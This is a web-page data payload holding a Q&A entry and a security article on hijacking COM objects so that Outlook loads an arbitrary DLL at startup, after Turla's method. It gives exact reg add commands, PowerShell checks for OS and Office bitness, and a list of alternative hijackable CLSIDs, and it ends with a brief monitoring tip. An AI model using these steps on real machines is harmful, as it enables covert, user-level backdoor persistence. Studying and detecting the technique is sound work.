[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fiEi-YuFGXx0iMCwjtGb4sOKnK2uP7K67-g4-rUl7gAI":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":30,"aiConfidence":30,"updatedAt":51,"createdAt":51,"_status":50},30,"How does the provided PowerShell script automate the COM hijacking exploitation against Outlook?","The script first determines the system architecture (32‑ or 64‑bit) and the Office version (by checking the `MEDIA` folder under `C:\\Program Files\\Microsoft Office`). It then selects the correct registry path (`HKCU\\Software\\Classes\\CLSID` or `Wow6432Node`) and adds the required registry entries for the two COM objects, automating the entire persistence setup without needing admin rights.","\u003Cp>The script first determines the system architecture (32‑ or 64‑bit) and the Office version (by checking the `MEDIA` folder under `C:\\Program Files\\Microsoft Office`). It then selects the correct registry path (`HKCU\\Software\\Classes\\CLSID` or `Wow6432Node`) and adds the required registry entries for the two COM objects, automating the entire persistence setup without needing admin rights.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-outlook\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-provided-powershell-script-automate-the-com-hijacking-exploitation--1777485476359","PowerShell script, automation, Office version detection, Wow6432Node, registry path",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":32,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":40,"qaPairs":41,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},9,"Use COM Object hijacking to maintain persistence——Hijack Outlook","use-com-object-hijacking-to-maintain-persistence-hijack-outlook","Learn how to use COM object hijacking for Outlook persistence, mimicking APT Trula's method. Includes PowerShell automation, registry tweaks, and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A backdoor exploitation method used by APT group Trula, which loads a DLL when Outlook starts via COM hijacking. Its characteristic is that it only requires the current user's permissions to achieve persistence.\u003C\u002Fp>\u003Cp>This article will test this method based on publicly available information, develop an automated exploitation script, explore extended usage, share multiple viable hijacking locations, and provide defense recommendations along with exploitation concepts.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.welivesecurity.com\u002Fwp-content\u002Fuploads\u002F2018\u002F08\u002FEset-Turla-Outlook-Backdoor.pdf\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Method\u003C\u002Fli>\u003Cli>Details of PowerShell Script Implementation\u003C\u002Fli>\u003Cli>Extended Usage\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Outlook loads multiple COM objects during startup. We can hijack Outlook's startup process by modifying the registry to load a DLL.\u003C\u002Fp>\u003Cp>This exploitation method requires adding two registry entries and modifying two COM objects.\u003C\u002Fp>\u003Cp>Since we are modifying the HKCU registry, current user privileges are sufficient.\u003C\u002Fp>\u003Ch3>(1) COM Object 1, used to load the second COM object\u003C\u002Fh3>\u003Cp>Add the following registry entry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKCU\\Software\\Classes\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs = {49CBB1C7-97D1-485A-9EC1-A26065633066}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to implement this via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\Software\\Classes\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs \u002Ft REG_SZ \u002Fd \"{49CBB1C7-97D1-485A-9EC1-A26065633066}\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>(2) COM Object 2, used to load the DLL\u003C\u002Fh3>\u003Cp>Add the following registry entries:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066} = Mail Plugin\u003Cbr>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 = [Path to the backdoor DLL]\u003Cbr>HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32\\ThreadingModel = Apartment\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to implement this via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066} \u002Ft REG_SZ \u002Fd \"Mail Plugin\" \u002Ff\u003Cbr>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 \u002Ft REG_SZ \u002Fd \"c:\\\\test\\\\calc.dll\" \u002Ff\u003Cbr>reg add HKCU\\Software\\Classes\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InprocServer32 \u002Fv ThreadingModel \u002Ft REG_SZ \u002Fd \"Apartment\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>calc.dll can use the previous test DLL, available at: an open-source project\u003C\u002Fp>\u003Cp>After adding the registry, launch Outlook, which loads the DLL multiple times and pops up multiple calculators. A mutex can be used here to ensure only one calculator pops up. DLL download address:\u003C\u002Fp>\u003Cp>an open-source project\u003C\u002Fp>\u003Cp>For 64-bit Windows systems with 32-bit Office installed, the registry location for the two COM objects needs to be modified to HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fp>\u003Ch2>0x03 PowerShell Script Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The implementation process is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Determine the operating system bitness\u003C\u002Fli>\u003Cli>Determine the Office software version\u003C\u002Fli>\u003Cli>If it's a 64-bit system with 32-bit Office installed, the registry location is HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\; otherwise, the registry location is HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fli>\u003Cli>Add the corresponding registry entries\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The specific code is as follows:\u003C\u002Fp>\u003Ch4>1. Determine the operating system bitness\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if ([IntPtr]::Size -eq 8)\u003Cbr>{\u003Cbr>    '64-bit'\u003Cbr>}\u003Cbr>else\u003Cbr>{\u003Cbr>    '32-bit'\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Determine the installed Office software version\u003C\u002Fh4>\u003Cp>Check if the default installation path C:\\Program Files\\Microsoft Office contains the MEDIA folder\u003C\u002Fp>\u003Cp>If it contains, then it is 64-bit Office, otherwise it is 32-bit Office\u003C\u002Fp>\u003Cp>PowerShell code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Try  \u003Cbr>{  \u003Cbr>\tdir C:\\Program Files\\Microsoft Office\\MEDIA\u003Cbr>\tWrite-Host \"Microsoft Office: 64-bit\"\u003Cbr>}\u003Cbr>Catch\u003Cbr>{\u003Cbr>\tWrite-Host \"Microsoft Office: 32-bit\"\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The implementation code has been open-sourced at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code automatically determines the operating system architecture and Office software version, then adds corresponding registry entries\u003C\u002Fp>\u003Ch2>0x04 Extended Usage\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Use Process Monitor to monitor the Outlook startup process and identify other available COM objects\u003C\u002Fp>\u003Cp>Testing revealed multiple available methods in Outlook 2013\u003C\u002Fp>\u003Cp>Replace COM object 1 with any of the following, while keeping COM object 2 unchanged\u003C\u002Fp>\u003Cp>Available COM object 1:\u003C\u002Fp>\u003Cul>\u003Cli>{B056521A-9B10-425E-B616-1FCD828DB3B1}\u003C\u002Fli>\u003Cli>{EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120}\u003C\u002Fli>\u003Cli>{93E5752E-B889-47C5-8545-654EE2533C64}\u003C\u002Fli>\u003Cli>{56FDF344-FD6D-11D0-958A-006097C9A090}\u003C\u002Fli>\u003Cli>{2163EB1F-3FD9-4212-A41F-81D1F933597F}\u003C\u002Fli>\u003Cli>{A6A2383F-AD50-4D52-8110-3508275E77F7}\u003C\u002Fli>\u003Cli>{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\u003C\u002Fli>\u003Cli>{88D96A05-F192-11D4-A65F-0040963251E5}\u003C\u002Fli>\u003Cli>{807583E5-5146-11D5-A672-00B0D022E945}\u003C\u002Fli>\u003Cli>{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\u003C\u002Fli>\u003Cli>{3CE74DE4-53D3-4D74-8B83-431B3828BA53}\u003C\u002Fli>\u003Cli>{A4B544A1-438D-4B41-9325-869523E2D6C7}\u003C\u002Fli>\u003Cli>{33C53A50-F456-4884-B049-85FD643ECFED}\u003C\u002Fli>\u003Cli>{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\u003C\u002Fli>\u003Cli>{275C23E2-3747-11D0-9FEA-00AA003F8646}\u003C\u002Fli>\u003Cli>{C15BB852-6F97-11D3-A990-00104B2A619F}\u003C\u002Fli>\u003Cli>{ED475410-B0D6-11D2-8C3B-00104B2A6676}\u003C\u002Fli>\u003Cli>{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\u003C\u002Fli>\u003Cli>{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\u003C\u002Fli>\u003Cli>{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor creation and modification operations under the following registry keys:\u003C\u002Fp>\u003Cul>\u003Cli>HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fli>\u003Cli>HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces a method to load a DLL during Outlook startup via COM hijacking, shares multiple available hijacking locations, and provides defense recommendations based on exploitation techniques.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,3,"published","2026-02-02T08:20:29.496Z",{"title":37,"description":14,"keywords":38,"ogImage":30,"canonicalUrl":30,"noIndex":39},"COM Object Hijacking for Outlook Persistence: APT Trula Method","COM hijacking, Outlook persistence, APT Trula, backdoor, DLL loading, registry exploit, PowerShell script, defense recommendations",false,[],{"docs":42,"hasNextPage":39},[43,44,4,45,46],32,31,29,28,{"title":30,"description":30,"image":30},"2026-07-24T02:07:30.777Z","2026-07-23T16:00:54.278Z","draft","2026-07-23T16:03:02.691Z"]